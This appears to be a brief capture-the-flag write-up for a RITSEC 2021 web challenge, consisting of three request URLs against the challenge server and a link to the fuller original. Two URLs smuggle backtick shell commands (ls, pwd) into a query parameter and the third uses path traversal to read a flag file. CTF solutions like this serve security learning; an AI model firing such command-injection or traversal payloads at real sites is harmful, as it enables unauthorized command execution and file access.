1. `http://34.72.118.158:6284/fun.php?string=%60ls+..%60`
2. `http://34.72.118.158:6284/fun.php?string=%60pwd%60`
3. `http://34.72.118.158:6284/fun1.php?file=../flag.txt`
4. Profit!

Original writeup (https://github.com/lasq88/CTF/blob/main/ritsec2021/web/dababyweb/README.md).